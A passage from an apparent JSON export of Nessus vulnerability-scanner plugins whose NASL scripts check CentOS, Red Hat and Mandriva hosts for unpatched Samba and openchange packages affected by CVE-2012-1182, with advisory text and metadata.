reference:\"nss_wins-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"samba-client-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"samba-common-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"samba-doc-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"samba-domainjoin-gui-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"samba-server-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"samba-swat-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"samba-winbind-3.5.3-3.5mdv2010.2\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64netapi-devel-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64netapi0-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64smbclient0-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64smbclient0-devel-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64smbclient0-static-devel-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64smbsharemodes-devel-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64smbsharemodes0-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64wbclient-devel-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64wbclient0-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libnetapi-devel-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libnetapi0-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libsmbclient0-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libsmbclient0-devel-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libsmbclient0-static-devel-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libsmbsharemodes-devel-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libsmbsharemodes0-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libwbclient-devel-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libwbclient0-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mount-cifs-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"nss_wins-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"samba-client-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"samba-common-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"samba-doc-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"samba-domainjoin-gui-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"samba-server-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"samba-swat-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"samba-winbind-3.5.10-1.2-mdv2011.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:55:48", "description": "Updated openchange packages that fix one security issue, several bugs, and add various enhancements are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe openchange packages provide libraries to access Microsoft Exchange servers using native protocols. Evolution-MAPI uses these libraries to integrate the Evolution PIM application with Microsoft Exchange servers.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler. As OpenChange uses code generated by PIDL, this could have resulted in buffer overflows in the way OpenChange handles RPC calls.\nWith this update, the code has been generated with an updated version of PIDL to correct this issue. (CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0, which provides a number of bug fixes and enhancements over the previous version, including support for the rebased samba4 packages and several API changes. (BZ#767672, BZ#767678)\n\nThis update also fixes the following bugs :\n\n* When the user tried to modify a meeting with one required attendee and himself as the organizer, a segmentation fault occurred in the memcpy() function. Consequently, the evolution-data-server application terminated unexpectedly with a segmentation fault. This bug has been fixed and evolution-data-server no longer crashes in the described scenario. (BZ#680061)\n\n* Prior to this update, OpenChange 1.0 was unable to send messages with a large message body or with extensive attachment. This was caused by minor issues in OpenChange's exchange.idl definitions. This bug has been fixed and OpenChange now sends extensive messages without complications. (BZ#870405)\n\nAll users of openchange are advised to upgrade to these updated packages, which fix these issues and add these enhancements.", "cvss3": {"score": null, "vector": null}, "published": "2013-03-10T00:00:00", "type": "nessus", "title": "CentOS 6 : evolution-mapi / openchange (CESA-2013:0515)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:evolution-mapi", "p-cpe:/a:centos:centos:evolution-mapi-devel", "p-cpe:/a:centos:centos:openchange", "p-cpe:/a:centos:centos:openchange-client", "p-cpe:/a:centos:centos:openchange-devel", "p-cpe:/a:centos:centos:openchange-devel-docs", "cpe:/o:centos:centos:6"], "id": "CENTOS_RHSA-2013-0515.NASL", "href": "https://www.tenable.com/plugins/nessus/65147", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0515 and \n# CentOS Errata and Security Advisory 2013:0515 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65147);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"RHSA\", value:\"2013:0515\");\n\n script_name(english:\"CentOS 6 : evolution-mapi / openchange (CESA-2013:0515)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated openchange packages that fix one security issue, several bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe openchange packages provide libraries to access Microsoft Exchange\nservers using native protocols. Evolution-MAPI uses these libraries to\nintegrate the Evolution PIM application with Microsoft Exchange\nservers.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler. As OpenChange uses code generated by PIDL, this could have\nresulted in buffer overflows in the way OpenChange handles RPC calls.\nWith this update, the code has been generated with an updated version\nof PIDL to correct this issue. (CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version, including support for the rebased samba4 packages\nand several API changes. (BZ#767672, BZ#767678)\n\nThis update also fixes the following bugs :\n\n* When the user tried to modify a meeting with one required attendee\nand himself as the organizer, a segmentation fault occurred in the\nmemcpy() function. Consequently, the evolution-data-server application\nterminated unexpectedly with a segmentation fault. This bug has been\nfixed and evolution-data-server no longer crashes in the described\nscenario. (BZ#680061)\n\n* Prior to this update, OpenChange 1.0 was unable to send messages\nwith a large message body or with extensive attachment. This was\ncaused by minor issues in OpenChange's exchange.idl definitions. This\nbug has been fixed and OpenChange now sends extensive messages without\ncomplications. (BZ#870405)\n\nAll users of openchange are advised to upgrade to these updated\npackages, which fix these issues and add these enhancements.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2013-March/019320.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?acd2f3bf\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2013-March/019453.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1efe6731\"\n );\n # https://lists.centos.org/pipermail/centos-cr-announce/2013-February/000508.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cb66afc8\"\n );\n # https://lists.centos.org/pipermail/centos-cr-announce/2013-February/000644.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5cb6d25d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected evolution-mapi and / or openchange packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-1182\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:evolution-mapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:evolution-mapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openchange\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openchange-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openchange-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openchange-devel-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"evolution-mapi-0.28.3-12.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"evolution-mapi-devel-0.28.3-12.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"openchange-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"openchange-client-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"openchange-devel-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"openchange-devel-docs-1.0-4.el6\")) flag++;\n\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"evolution-mapi / evolution-mapi-devel / openchange / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:36", "description": "Updated samba packages that fix one security issue are now available for Red Hat Enterprise Linux 5 and 6; Red Hat Enterprise Linux 5.3 Long Life; and Red Hat Enterprise Linux 5.6, 6.0 and 6.1 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block (SMB) or Common Internet File System (CIFS) protocol, which allows PC-compatible machines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used to generate code to handle RPC calls, resulted in multiple buffer overflows in Samba. A remote, unauthenticated attacker could send a specially crafted RPC request that would cause the Samba daemon (smbd) to crash or, possibly, execute arbitrary code with the privileges of the root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which contain a backported patch to resolve this issue. After installing this update, the smb service will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2012-04-11T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 : samba (RHSA-2012:0465)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:libsmbclient", "p-cpe:/a:redhat:enterprise_linux:libsmbclient-devel", "p-cpe:/a:redhat:enterprise_linux:samba", "p-cpe:/a:redhat:enterprise_linux:samba-client", "p-cpe:/a:redhat:enterprise_linux:samba-common", "p-cpe:/a:redhat:enterprise_linux:samba-debuginfo", "p-cpe:/a:redhat:enterprise_linux:samba-doc", "p-cpe:/a:redhat:enterprise_linux:samba-domainjoin-gui", "p-cpe:/a:redhat:enterprise_linux:samba-swat", "p-cpe:/a:redhat:enterprise_linux:samba-winbind", "p-cpe:/a:redhat:enterprise_linux:samba-winbind-clients", "p-cpe:/a:redhat:enterprise_linux:samba-winbind-devel", "p-cpe:/a:redhat:enterprise_linux:samba-winbind-krb5-locator", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:5.3", "cpe:/o:redhat:enterprise_linux:5.6", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.1", "cpe:/o:redhat:enterprise_linux:6.2"], "id": "REDHAT-RHSA-2012-0465.NASL", "href": "https://www.tenable.com/plugins/nessus/58672", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0465. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58672);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_xref(name:\"RHSA\", value:\"2012:0465\");\n\n script_name(english:\"RHEL 5 / 6 : samba (RHSA-2012:0465)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5 and 6; Red Hat Enterprise Linux 5.3\nLong Life; and Red Hat Enterprise Linux 5.6, 6.0 and 6.1 Extended\nUpdate Support.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing\nthis update, the smb service will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0465\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-1182\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0465\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", reference:\"libsmbclient-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", reference:\"libsmbclient-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", reference:\"libsmbclient-devel-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", reference:\"libsmbclient-devel-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"samba-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba-client-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba-client-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"samba-client-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba-client-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba-client-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba-client-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", reference:\"samba-common-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", reference:\"samba-common-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba-swat-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba-swat-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"samba-swat-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba-swat-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba-swat-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba-swat-3.0.33-3.39.el5_8\")) flag++; }\n\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", reference:\"libsmbclient-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", reference:\"libsmbclient-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", reference:\"libsmbclient-devel-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", reference:\"libsmbclient-devel-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"samba-3.5.6-86.el6_1.5\")) flag++; }\n else { if 